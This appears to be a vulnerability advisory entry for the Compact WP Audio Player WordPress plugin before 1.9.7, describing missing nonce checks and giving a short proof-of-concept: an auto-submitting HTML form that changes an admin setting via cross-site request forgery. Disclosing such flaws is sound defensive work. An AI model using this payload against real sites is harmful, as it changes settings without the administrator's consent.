WordPress Plugin Vulnerabilities
Compact WP Audio Player < 1.9.7 - Setting Change via CSRF
Description
The plugin does not implement nonce checks, which could allow attackers to make a logged in admin change the "Disable Simultaneous Play" setting via a CSRF attack.
Proof of Concept
<form action="https://example.com/wp-admin/options-general.php?page=compact-wp-audio-player%2Fsc_audio_player.php" method="post" id="csrf"> <input name="sc_audio_player_settings" value="1" type="hidden"> <input name="sc_audio_disable_simultaneous_play" value="1" type="hidden"> </form> <script>csrf.submit()</script>
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-09-15 (about 2 years ago)
Added
2021-09-15 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)